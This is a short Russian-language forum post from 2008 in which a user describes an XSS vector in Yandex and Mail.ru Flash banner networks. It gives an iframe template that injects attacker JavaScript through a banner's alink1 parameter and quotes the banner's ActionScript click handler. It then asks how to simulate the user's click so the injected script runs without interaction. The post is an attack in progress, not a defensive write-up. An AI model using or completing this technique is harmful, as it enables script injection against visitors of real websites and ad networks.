
21.11.2008, 19:01
|
|
Новичок
Регистрация: 29.04.2008
Сообщений: 9
Провел на форуме: 55354
Репутация:
39
|
|
Имитация нажатия flash баннера
Ввиду возможности XSS атак на баннерные сети яндекса и мэил.ру (да и многие другие) стало интересно, возможно ли как-то имитировать нажатие на flash баннер?
Получается, что можно сформировать определенную страницу вроде
Код:
<html>
<iframe height="90" width="628" frameBorder="0" src="http://yabs.yandex.ru/images/200x60-1.swf?alink1=[здесь java скрпит злоумышленника]</iframe>
</html>
Однако такая проблема: чтобы код выполнился необходимо, чтобы пользователь дополнительно нажал на сам баннер.
Возможно ли имитировать нажатие другим встроенным в страницу скриптом?
Структура баннера такова: в центре кнопка и привязанный к ней скрипт:
Код:
on (release) {
getURL(alink1, "_blank");
}
|
|
|